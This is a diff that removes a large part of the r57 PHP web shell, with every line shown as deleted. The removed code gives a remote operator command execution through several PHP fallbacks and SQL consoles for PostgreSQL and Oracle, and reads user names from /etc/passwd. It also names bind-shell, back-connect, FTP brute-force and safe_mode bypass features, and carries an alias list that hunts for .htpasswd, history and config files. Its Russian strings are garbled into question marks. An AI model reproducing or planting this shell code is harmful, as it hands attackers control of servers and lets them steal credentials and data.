-        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}

-        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);

-        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";

-        }

-       echo "<table width=100%>";

-       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";

-       $sql .= $sql2;

-       echo $sql;

-       echo "</table><br>";

-       }

-      else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }

-      }

-      @pg_free_result($res);

-      }

-     }    

-        @pg_close($db);

-   }

-  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>";

-  break;

-  case 'Oracle':

-  $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']);

-  if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; }

-  else

-   {

-   $querys = @explode(';',$_POST['db_query']);

-   foreach($querys as $num=>$query)

-    { 

-    if(strlen($query)>5) {

-    echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";

-    $stat = @ociparse($db, $query);

-    @ociexecute($stat);

-    if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; }

-    else 

-     {

-     $rowcount = @ocirowcount($stat);

-     if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";}

-     else {

-     echo "<table width=100%><tr>";

-     for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; }

-     echo "</tr>";

-     while(ocifetch($stat))

-      {

-      echo "<tr>";

-      for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; }

-      echo "</tr>";

-      }

-     echo "</table><br>";

-     }

-     @ocifreestatement($stat); 

-     }

-    }

-    }

-   @ocilogoff($db);

-   }

-  break;

-  }

- echo "<form name=form method=POST>";

- echo in('hidden','db',0,$_POST['db']);

- echo in('hidden','db_port',0,$_POST['db_port']);

- echo in('hidden','mysql_l',0,$_POST['mysql_l']);

- echo in('hidden','mysql_p',0,$_POST['mysql_p']);

- echo in('hidden','mysql_db',0,$_POST['mysql_db']);

- echo in('hidden','cmd',0,'db_query');

- echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; 

- echo "</form>";

- echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();

- }      

-if(isset($_GET['delete']))

- {

-   @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));

- }

-if(isset($_GET['tmp']))

- {

-   @unlink("/tmp/bdpl");

-   @unlink("/tmp/back");

-   @unlink("/tmp/bd");

-   @unlink("/tmp/bd.c");

-   @unlink("/tmp/dp");

-   @unlink("/tmp/dpc");

-   @unlink("/tmp/dpc.c");

- }

-if(isset($_GET['phpini']))

-{

-echo $head;

-function U_value($value)

- {

- if ($value == '') return '<i>no value</i>';

- if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';

- if ($value === null) return 'NULL';

- if (@is_object($value)) $value = (array) $value;

- if (@is_array($value))

- {

- @ob_start();

- print_r($value);

- $value = @ob_get_contents();

- @ob_end_clean();

- }

- return U_wordwrap((string) $value);

- }

-function U_wordwrap($str)

- {

- $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);

- return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);

- }

-if (@function_exists('ini_get_all'))

- {

- $r = '';

- echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';

- foreach (@ini_get_all() as $key=>$value)

-  {

-  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';

-  }

- echo $r;

- echo '</table>';

- }

-echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";

-die();

-}

-if(isset($_GET['cpu']))

- {

-   echo $head;

-   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';

-   $cpuf = @file("cpuinfo");

-   if($cpuf)

-    {

-      $c = @sizeof($cpuf);

-      for($i=0;$i<$c;$i++)

-        {

-          $info = @explode(":",$cpuf[$i]);

-          if($info[1]==""){ $info[1]="---"; }

-          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';

-        }

-      echo $r;

-    }

-   else

-    {

-      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';

-    }

-   echo '</table>';

-   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";

-   die();

- }

-if(isset($_GET['mem']))

- {

-   echo $head;

-   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';

-   $memf = @file("meminfo");

-   if($memf)

-    {

-      $c = sizeof($memf);

-      for($i=0;$i<$c;$i++)

-        {

-          $info = explode(":",$memf[$i]);

-          if($info[1]==""){ $info[1]="---"; }

-          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';

-        }

-      echo $r;

-    }

-   else

-    {

-      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';

-    }

-   echo '</table>';

-   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";

-   die();

- }

-$lang=array(

-'ru_text1' =>'??????????? ???????',

-'ru_text2' =>'?????????? ?????? ?? ???????',

-'ru_text3' =>'????????? ???????',

-'ru_text4' =>'??????? ??????????',

-'ru_text5' =>'???????? ?????? ?? ??????',

-'ru_text6' =>'????????? ????',

-'ru_text7' =>'??????',

-'ru_text8' =>'???????? ?????',

-'ru_butt1' =>'?????????',

-'ru_butt2' =>'?????????',

-'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',

-'ru_text10'=>'??????? ????',

-'ru_text11'=>'?????? ??? ???????',

-'ru_butt3' =>'???????',

-'ru_text12'=>'back-connect',

-'ru_text13'=>'IP-?????',

-'ru_text14'=>'????',

-'ru_butt4' =>'?????????',

-'ru_text15'=>'???????? ?????? ? ?????????? ???????',

-'ru_text16'=>'????????????',

-'ru_text17'=>'????????? ????',

-'ru_text18'=>'????????? ????',

-'ru_text19'=>'Exploits',

-'ru_text20'=>'????????????',

-'ru_text21'=>'????? ???',

-'ru_text22'=>'datapipe',

-'ru_text23'=>'????????? ????',

-'ru_text24'=>'????????? ????',

-'ru_text25'=>'????????? ????',

-'ru_text26'=>'????????????',

-'ru_butt5' =>'?????????',

-'ru_text28'=>'?????? ? safe_mode',

-'ru_text29'=>'?????? ????????',

-'ru_butt6' =>'???????',

-'ru_text30'=>'???????? ?????',

-'ru_butt7' =>'???????',

-'ru_text31'=>'???? ?? ??????',

-'ru_text32'=>'?????????? PHP ????',

-'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',

-'ru_butt8' =>'?????????',

-'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',

-'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',

-'ru_text36'=>'????',

-'ru_text37'=>'?????',

-'ru_text38'=>'??????',

-'ru_text39'=>'???????',

-'ru_text40'=>'???? ??????? ???? ??????',

-'ru_butt9' =>'????',

-'ru_text41'=>'????????? ? ?????',

-'ru_text42'=>'?????????????? ?????',

-'ru_text43'=>'????????????? ????',

-'ru_butt10'=>'?????????',

-'ru_butt11'=>'?????????????',

-'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',

-'ru_text45'=>'???? ????????',

-'ru_text46'=>'???????? phpinfo()',

-'ru_text47'=>'???????? ???????? php.ini',

-'ru_text48'=>'???????? ????????? ??????',

-'ru_text49'=>'???????? ??????? ? ???????',

-'ru_text50'=>'?????????? ? ??????????',

-'ru_text51'=>'?????????? ? ??????',

-'ru_text52'=>'????? ??? ??????',

-'ru_text53'=>'?????? ? ?????',

-'ru_text54'=>'????? ?????? ? ??????',

-'ru_butt12'=>'?????',

-'ru_text55'=>'?????? ? ??????',

-'ru_text56'=>'?????? ?? ???????',

-'ru_text57'=>'???????/??????? ????/??????????',

-'ru_text58'=>'???',

-'ru_text59'=>'????',

-'ru_text60'=>'??????????',

-'ru_butt13'=>'???????/???????',

-'ru_text61'=>'???? ??????',

-'ru_text62'=>'?????????? ???????',

-'ru_text63'=>'???? ??????',

-'ru_text64'=>'?????????? ???????',

-'ru_text65'=>'???????',

-'ru_text66'=>'???????',

-'ru_text67'=>'Chown/Chgrp/Chmod',

-'ru_text68'=>'???????',

-'ru_text69'=>'????????1',

-'ru_text70'=>'????????2',

-'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",

-'ru_text72'=>'????? ??? ??????',

-'ru_text73'=>'?????? ? ?????',

-'ru_text74'=>'?????? ? ??????',

-'ru_text75'=>'* ????? ???????????? ?????????? ?????????',

-'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',

-'ru_text77'=>'???????? ????????? ???? ??????',

-'ru_text78'=>'?????????? ???????',

-'ru_text79'=>'?????????? ???????',

-'ru_text80'=>'???',

-'ru_text81'=>'????',

-'ru_text82'=>'???? ??????',

-'ru_text83'=>'?????????? SQL ???????',

-'ru_text84'=>'SQL ??????',

-'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',

-'ru_text86'=>'?????????? ????? ? ???????',

-'ru_butt14'=>'???????',

-'ru_text87'=>'???????? ?????? ? ?????????? ftp-???????',

-'ru_text88'=>'FTP-??????:????',

-'ru_text89'=>'???? ?? ftp ???????',

-'ru_text90'=>'????? ????????',

-'ru_text91'=>'???????????? ?',

-'ru_text92'=>'??? ?????????',

-'ru_text93'=>'FTP',

-'ru_text94'=>'FTP-????????',

-'ru_text95'=>'?????? ?????????????',

-'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',

-'ru_text97'=>'????????? ??????????: ',

-'ru_text98'=>'??????? ???????????: ',

-'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd',

-'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',

-'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????',

-'ru_text102'=>'?????',

-'ru_text103'=>'???????? ??????',

-'ru_text104'=>'???????? ????? ?? ???????? ????',

-'ru_text105'=>'????',

-'ru_text106'=>'??',

-'ru_text107'=>'????',

-'ru_butt15'=>'?????????',

-'ru_text108'=>'????? ??????',

-'ru_text109'=>'????????',

-'ru_text110'=>'??????????',

-/* --------------------------------------------------------------- */

-'eng_text1' =>'Executed command',

-'eng_text2' =>'Execute command on server',

-'eng_text3' =>'Run command',

-'eng_text4' =>'Work directory',

-'eng_text5' =>'Upload files on server',

-'eng_text6' =>'Local file',

-'eng_text7' =>'Aliases',

-'eng_text8' =>'Select alias',

-'eng_butt1' =>'Execute',

-'eng_butt2' =>'Upload',

-'eng_text9' =>'Bind port to /bin/bash',

-'eng_text10'=>'Port',

-'eng_text11'=>'Password for access',

-'eng_butt3' =>'Bind',

-'eng_text12'=>'back-connect',

-'eng_text13'=>'IP',

-'eng_text14'=>'Port',

-'eng_butt4' =>'Connect',

-'eng_text15'=>'Upload files from remote server',

-'eng_text16'=>'With',

-'eng_text17'=>'Remote file',

-'eng_text18'=>'Local file',

-'eng_text19'=>'Exploits',

-'eng_text20'=>'Use',

-'eng_text21'=>'&nbsp;New name',

-'eng_text22'=>'datapipe',

-'eng_text23'=>'Local port',

-'eng_text24'=>'Remote host',

-'eng_text25'=>'Remote port',

-'eng_text26'=>'Use',

-'eng_butt5' =>'Run',

-'eng_text28'=>'Work in safe_mode',

-'eng_text29'=>'ACCESS DENIED',

-'eng_butt6' =>'Change',

-'eng_text30'=>'Cat file',

-'eng_butt7' =>'Show',

-'eng_text31'=>'File not found',

-'eng_text32'=>'Eval PHP code',

-'eng_text33'=>'Test bypass open_basedir with cURL functions',

-'eng_butt8' =>'Test',

-'eng_text34'=>'Test bypass safe_mode with include function',

-'eng_text35'=>'Test bypass safe_mode with load file in mysql',

-'eng_text36'=>'Database',

-'eng_text37'=>'Login',

-'eng_text38'=>'Password',

-'eng_text39'=>'Table',

-'eng_text40'=>'Dump database table',

-'eng_butt9' =>'Dump',

-'eng_text41'=>'Save dump in file',

-'eng_text42'=>'Edit files',

-'eng_text43'=>'File for edit',

-'eng_butt10'=>'Save',

-'eng_text44'=>'Can\'t edit file! Only read access!',

-'eng_text45'=>'File saved',

-'eng_text46'=>'Show phpinfo()',

-'eng_text47'=>'Show variables from php.ini',

-'eng_text48'=>'Delete temp files',

-'eng_butt11'=>'Edit file',

-'eng_text49'=>'Delete script from server',

-'eng_text50'=>'View cpu info',

-'eng_text51'=>'View memory info',

-'eng_text52'=>'Find text',

-'eng_text53'=>'In dirs',

-'eng_text54'=>'Find text in files',

-'eng_butt12'=>'Find',

-'eng_text55'=>'Only in files',

-'eng_text56'=>'Nothing :(',

-'eng_text57'=>'Create/Delete File/Dir',

-'eng_text58'=>'name',

-'eng_text59'=>'file',

-'eng_text60'=>'dir',

-'eng_butt13'=>'Create/Delete',

-'eng_text61'=>'File created',

-'eng_text62'=>'Dir created',

-'eng_text63'=>'File deleted',

-'eng_text64'=>'Dir deleted',

-'eng_text65'=>'Create',

-'eng_text66'=>'Delete',

-'eng_text67'=>'Chown/Chgrp/Chmod',

-'eng_text68'=>'Command',

-'eng_text69'=>'param1',

-'eng_text70'=>'param2',

-'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",

-'eng_text72'=>'Text for find',

-'eng_text73'=>'Find in folder',

-'eng_text74'=>'Find in files',

-'eng_text75'=>'* you can use regexp',

-'eng_text76'=>'Search text in files via find',

-'eng_text77'=>'Show database structure',

-'eng_text78'=>'show tables',

-'eng_text79'=>'show columns',

-'eng_text80'=>'Type',

-'eng_text81'=>'Net',

-'eng_text82'=>'Databases',

-'eng_text83'=>'Run SQL query',

-'eng_text84'=>'SQL query',

-'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',

-'eng_text86'=>'Download files from server',

-'eng_butt14'=>'Download',

-'eng_text87'=>'Download files from remote ftp-server',

-'eng_text88'=>'FTP-server:port',

-'eng_text89'=>'File on ftp',

-'eng_text90'=>'Transfer mode',

-'eng_text91'=>'Archivation',

-'eng_text92'=>'without archivation',

-'eng_text93'=>'FTP',

-'eng_text94'=>'FTP-bruteforce',

-'eng_text95'=>'Users list',

-'eng_text96'=>'Can\'t get users list',

-'eng_text97'=>'checked: ',

-'eng_text98'=>'success: ',

-'eng_text99'=>'* use username from /etc/passwd for ftp login and password',

-'eng_text100'=>'Send file to remote ftp server',

-'eng_text101'=>'Use reverse (user -> resu) login for password',

-'eng_text102'=>'Mail',

-'eng_text103'=>'Send email',

-'eng_text104'=>'Send file to email',

-'eng_text105'=>'To',

-'eng_text106'=>'From',

-'eng_text107'=>'Subj',

-'eng_butt15'=>'Send',

-'eng_text108'=>'Mail',

-'eng_text109'=>'Hide',

-'eng_text110'=>'Show',

-);

-/*

-?????? ??????

-????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )

-?? ?????? ???? ????????? ??? ???????? ???????.

-*/

-$aliases=array(

-'find suid files'=>'find / -type f -perm -04000 -ls',

-'find suid files in current dir'=>'find . -type f -perm -04000 -ls',

-'find sgid files'=>'find / -type f -perm -02000 -ls',

-'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',

-'find config.inc.php files'=>'find / -type f -name config.inc.php',

-'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',

-'find config* files'=>'find / -type f -name "config*"',

-'find config* files in current dir'=>'find . -type f -name "config*"',

-'find all writable files'=>'find / -type f -perm -2 -ls',

-'find all writable files in current dir'=>'find . -type f -perm -2 -ls',

-'find all writable directories'=>'find /  -type d -perm -2 -ls',

-'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',

-'find all writable directories and files'=>'find / -perm -2 -ls',

-'find all writable directories and files in current dir'=>'find . -perm -2 -ls',

-'find all service.pwd files'=>'find / -type f -name service.pwd',

-'find service.pwd files in current dir'=>'find . -type f -name service.pwd',

-'find all .htpasswd files'=>'find / -type f -name .htpasswd',

-'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',

-'find all .bash_history files'=>'find / -type f -name .bash_history',

-'find .bash_history files in current dir'=>'find . -type f -name .bash_history',

-'find all .mysql_history files'=>'find / -type f -name .mysql_history',

-'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',

-'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',

-'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',

-'list file attributes on a Linux second extended file system'=>'lsattr -va',

-'show opened ports'=>'netstat -an | grep -i listen',

-'----------------------------------------------------------------------------------------------------'=>'ls -la'

-);

-$table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";

-$table_up2  = " ::</div></b></font></td></tr><tr><td>";

-$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";

-$table_end1 = "</td></tr>";

-$arrow = " <font face=Wingdings color=gray>?</font>";

-$lb = "<font color=black>[</font>";

-$rb = "<font color=black>]</font>";

-$font = "<font face=Verdana size=-2>";

-$ts = "<table class=table1 width=100% align=center>";

-$te = "</table>";

-$fs = "<form name=form method=POST>";

-$fe = "</form>";

-

-if(isset($_GET['users'])) 

- { 

- if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }

- else 

-  { 

-  echo '<center>';

-  foreach($users as $user) { echo $user."<br>"; }

-  echo '</center>';

-  }

- echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); 

- }

-

-if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }

-$dir = @getcwd();

-$windows = 0;

-$unix = 0;

-if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;

-if(empty($dir))

- { 

- $os = getenv('OS');

- if(empty($os)){ $os = php_uname(); } 

- if(empty($os)){ $os ="-"; $unix=1; } 

- else

-    {

-    if(@eregi("^win",$os)) { $windows = 1; }

-    else { $unix = 1; }

-    }

- }

-if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")

-  {

-    echo $head;

-    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }

-    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }

-    $sr->SearchText(0,0);

-    $res = $sr->GetResultFiles();

-    $found = $sr->GetMatchesCount();

-    $titles = $sr->GetTitles();

-    $r = "";

-    if($found > 0)

-    {

-      $r .= "<TABLE width=100%>";

-      foreach($res as $file=>$v)

-      {

-        $r .= "<TR>";

-        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);

-        $r .= ($windows)? str_replace("/","\\",$file) : $file;

-        $r .= "</b></font></ TD>";

-        $r .= "</TR>";

-        foreach($v as $a=>$b)

-        {

-          $r .= "<TR>";

-          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";

-          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";

-          $r .= "</TR>\n";

-        }

-      }

-      $r .= "</TABLE>";

-    echo $r;

-    }

-    else

-    {

-      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";

-    }

-  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";

-  die(); 

-  }                                                          

-if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }

-$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');

-if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }

-function ws($i)

-{

-return @str_repeat("&nbsp;",$i);

-}

-function ex($cfe)

-{

- $res = '';

- if (!empty($cfe))

- {

-  if(function_exists('exec'))

-   {

-    @exec($cfe,$res);

-    $res = join("\n",$res);

-   }

-  elseif(function_exists('shell_exec'))

-   {

-    $res = @shell_exec($cfe);

-   }

-  elseif(function_exists('system'))

-   {

-    @ob_start();

-    @system($cfe);

-    $res = @ob_get_contents();

-    @ob_end_clean();

-   }

-  elseif(function_exists('passthru'))

-   {

-    @ob_start();

-    @passthru($cfe);

-    $res = @ob_get_contents();

-    @ob_end_clean();

-   }

-  elseif(@is_resource($f = @popen($cfe,"r")))

-  {

-   $res = "";

-   while(!@feof($f)) { $res .= @fread($f,1024); }

-   @pclose($f);

-  }

- }

- return $res;

-}

-function get_users()

-{

-  $users = array();

-  $rows=file('/etc/passwd');

-  if(!$rows) return 0;  

-  foreach ($rows as $string)

-   {

-        $user = @explode(":",$string);

-        if(substr($string,0,1)!='#') array_push($users,$user[0]);

-   }

-  return $users;        

-}

-function we($i)

-{

-if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ???????? ? ???? '; }

-else { $text = "[-] ERROR! Can't write in file "; }

-echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";

-return null;

-}

-function re($i)

-{

-if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ????????? ???? '; }

-else { $text = "[-] ERROR! Can't read file "; }

-echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";

-return null;

-}

-function ce($i)

-{

-if($GLOBALS['language']=="ru"){ $text = "?? ??????? ??????? "; }

-else { $text = "Can't create "; }

-echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";

-return null;

-}

-function fe($l,$n)

-{

-$text['ru']  = array('?? ??????? ???????????? ? ftp ???????','?????? ??????????? ?? ftp ???????','?? ??????? ???????? ?????????? ?? ftp ???????');

-$text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server');    

-echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>";

-return null;

-}

-function mr($l,$n)

-{

-$text['ru']  = array('?? ??????? ????????? ??????','?????? ??????????');

-$text['eng'] = array('Can\'t send mail','Mail sent');   

-echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>";

-return null;

-}

-function perms($mode)

-{

-if ($GLOBALS['windows']) return 0;

-if( $mode & 0x1000 ) { $type='p'; }

-else if( $mode & 0x2000 ) { $type='c'; }

-else if( $mode & 0x4000 ) { $type='d'; }

-else if( $mode & 0x6000 ) { $type='b'; }

-else if( $mode & 0x8000 ) { $type='-'; }

-else if( $mode & 0xA000 ) { $type='l'; }

-else if( $mode & 0xC000 ) { $type='s'; }

-else $type='u';

-$owner["read"] = ($mode & 00400) ? 'r' : '-';

-$owner["write"] = ($mode & 00200) ? 'w' : '-';

-$owner["execute"] = ($mode & 00100) ? 'x' : '-';

-$group["read"] = ($mode & 00040) ? 'r' : '-';

-$group["write"] = ($mode & 00020) ? 'w' : '-';

-$group["execute"] = ($mode & 00010) ? 'x' : '-';

-$world["read"] = ($mode & 00004) ? 'r' : '-';

-$world["write"] = ($mode & 00002) ? 'w' : '-';

-$world["execute"] = ($mode & 00001) ? 'x' : '-';

-if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';

-if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';

-if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';

-$s=sprintf("%1s", $type);

-$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);

-$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);

-$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);

-return trim($s);

-}

-function in($type,$name,$size,$value)

-{

- $ret = "<input type=".$type." name=".$name." ";

- if($size != 0) { $ret .= "size=".$size." "; }

- $ret .= "value=\"".$value."\">";

- return $ret;

-}

-function which($pr)

-{

-$path = ex("which $pr");

-if(!empty($path)) { return $path; } else { return $pr; }

-}

-function cf($fname,$text)

-{

- $w_file=@fopen($fname,"w") or we($fname);

- if($w_file)

- {

- @fputs($w_file,@base64_decode($text));

- @fclose($w_file);

- }

-}

-function sr($l,$t1,$t2)

- {

- return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";

- }      

-if (!@function_exists("view_size"))

-{

-function view_size($size)

-{

- if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}

- elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}

- elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}

- else {$size = $size . " B";}

- return $size;

-}

-}

-function DirFiles($dir,$types='')

-  {

-    $files = Array();

-    if(($handle = @opendir($dir)))

-    {

-      while (FALSE !== ($file = @readdir($handle)))

-      {

-        if ($file != "." && $file != "..")

-        {

-          if(!is_dir($dir."/".$file))

-          {

-            if($types)

-            {

-              $pos = @strrpos($file,".");

-              $ext = @substr($file,$pos,@strlen($file)-$pos);

-              if(@in_array($ext,@explode(';',$types)))

-                $files[] = $dir."/".$file;

-            }

-            else

-              $files[] = $dir."/".$file;

-          }

-        }

-      }

-      @closedir($handle);

-    }

-    return $files;

-  }

-  function DirFilesWide($dir)

-  {

-    $files = Array();

-    $dirs = Array();

-    if(($handle = @opendir($dir)))

-    {

-      while (false !== ($file = @readdir($handle)))

-      {

-        if ($file != "." && $file != "..")

-        {

-          if(@is_dir($dir."/".$file))

-          {

-            $file = @strtoupper($file);

-            $dirs[$file] = '&lt;DIR&gt;';

-          }

-          else

-            $files[$file] = @filesize($dir."/".$file);

-        }

-      }

-      @closedir($handle);

-      @ksort($dirs);

-      @ksort($files);

-      $files = @array_merge($dirs,$files);

-    }

-    return $files;

-  }

-  function DirFilesR($dir,$types='')

-  {

-    $files = Array();

-    if(($handle = @opendir($dir)))

-    {

-      while (false !== ($file = @readdir($handle)))

-      {

-        if ($file != "." && $file != "..")

-        {

-          if(@is_dir($dir."/".$file))

-            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));

-          else

-          {

-            $pos = @strrpos($file,".");

-            $ext = @substr($file,$pos,@strlen($file)-$pos);

-            if($types)

-            {

-              if(@in_array($ext,explode(';',$types)))

-                $files[] = $dir."/".$file;

-            }

-            else

-              $files[] = $dir."/".$file;

-          }

-        }

-      }

-      @closedir($handle);

-    }

-    return $files;

-  }

-  function DirPrintHTMLHeaders($dir)

-  {

-    $pockets = '';

-        $handle = @opendir($dir) or die("Can't open directory $dir");

-    echo "    <ul style='margin-left: 0px; padding-left: 20px;'>\n";

-    while (false !== ($file = @readdir($handle)))

-    {

-      if ($file != "." && $file != "..")

-      {

-        if(@is_dir($dir."/".$file))

-        {

-          echo "      <li><b>[ $file ]</b></li>\n";

-          DirPrintHTMLHeaders($dir."/".$file);

-        }

-        else

-        {
